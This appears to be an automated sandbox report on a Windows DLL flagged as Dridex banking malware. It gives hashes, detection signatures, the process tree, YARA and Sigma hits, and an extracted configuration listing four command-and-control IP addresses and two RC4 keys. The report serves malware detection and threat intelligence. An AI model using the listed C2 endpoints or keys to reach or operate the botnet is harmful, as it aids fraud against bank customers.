Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Overview

General Information

Sample Name:	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll
Analysis ID:	544174
MD5:	57cc0ec93c55348dd7b864e26ec96379
SHA1:	bcf46bb64fc5a673e7889d9ba9baad26bfab0ff7
SHA256:	60bd3eba4dac7d37cd07e375f4dbfe5e816b0ab599f28da31c5cf5b180b5849a
Tags:	dllDridex
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Call by Ordinal

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Checks if the current process is being debugged

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Entry point lies outside standard sections

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6296 cmdline: loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 6328 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6368 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 6564 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6368 -s 684 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000000.263879217.000000006E831000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000002.303178231.000000006E831000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000000.261899992.000000006E831000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author
2.0.rundll32.exe.6e830000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.2.loaddll32.exe.6e830000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.2.rundll32.exe.6e830000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.0.rundll32.exe.6e830000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6328, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1, ProcessId: 6368

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.loaddll32.exe.6e830000.2.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Virustotal: Detection: 23%			Perma Link
Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	ReversingLabs: Detection: 25%

Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: ws2_32.pdb;. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdbq. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000006.00000003.268112270.0000000004C5D000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.269479129.0000000004C5D000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.269438809.0000000002E16000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.268022167.0000000002E16000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.269822443.0000000004C5E000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.273891782.0000000004C5E000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.266556290.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.268157671.0000000002E10000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.269628951.0000000002E10000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: dwmapi.pdbD; source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000006.00000003.268035308.0000000002E1C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.269053101.0000000002E1C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.268187692.0000000002E1C000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdbk. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdbg. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000006.00000003.268157671.0000000002E10000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.269628951.0000000002E10000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdbS. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdbU. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.266556290.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdbc source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb=. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdbO. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdbY. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbm. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000006.00000003.268035308.0000000002E1C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.269053101.0000000002E1C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.268187692.0000000002E1C000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000006.00000003.269438809.0000000002E16000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.268022167.0000000002E16000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdbA. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 144.91.122.102:443
Source: Malware configuration extractor	IPs: 85.10.248.28:593
Source: Malware configuration extractor	IPs: 185.4.135.27:5228
Source: Malware configuration extractor	IPs: 80.211.3.13:8116

Source: Joe Sandbox View	ASN Name: TOPHOSTGR TOPHOSTGR
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View	IP Address: 185.4.135.27 185.4.135.27
Source: Joe Sandbox View	IP Address: 85.10.248.28 85.10.248.28

Source: WerFault.exe, 00000006.00000002.300655792.0000000004BBF000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.298419024.0000000004BBF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.263902525.000000006E84F000.00000002.00020000.sdmp	String found in binary or memory: http://www.n4pkg6fy8o.gaDVarFileInfo$

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 2.0.rundll32.exe.6e830000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e830000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6e830000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.rundll32.exe.6e830000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.263879217.000000006E831000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.303178231.000000006E831000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.261899992.000000006E831000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Binary or memory string: OriginalFilenameIha.dllD vs SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6368 -s 684

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E840730	0_2_6E840730
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E849370	0_2_6E849370
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E831494	0_2_6E831494
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E83A4E8	0_2_6E83A4E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E838428	0_2_6E838428
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E84143C	0_2_6E84143C

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E842234 NtDelayExecution,		0_2_6E842234
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E842820 NtAllocateVirtualMemory,		0_2_6E842820

Source: C:\Windows\System32\loaddll32.exe

Process Stats: CPU usage > 98%

Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Virustotal: Detection: 23%
Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	ReversingLabs: Detection: 25%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6368 -s 684
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6368

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER97B6.tmp

Jump to behavior

Source: classification engine

Classification label: mal76.troj.evad.winDLL@6/6@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ws2_32.pdb;. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdbq. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000006.00000003.268112270.0000000004C5D000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.269479129.0000000004C5D000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.269438809.0000000002E16000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.268022167.0000000002E16000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.269822443.0000000004C5E000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.273891782.0000000004C5E000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.266556290.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.268157671.0000000002E10000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.269628951.0000000002E10000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: dwmapi.pdbD; source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000006.00000003.268035308.0000000002E1C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.269053101.0000000002E1C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.268187692.0000000002E1C000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdbk. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdbg. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000006.00000003.268157671.0000000002E10000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.269628951.0000000002E10000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdbS. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdbU. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.266556290.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdbc source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb=. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdbO. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdbY. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbm. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000006.00000003.268035308.0000000002E1C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.269053101.0000000002E1C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.268187692.0000000002E1C000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000006.00000003.273937807.0000000004F70000.00000004.00000040.sdmp
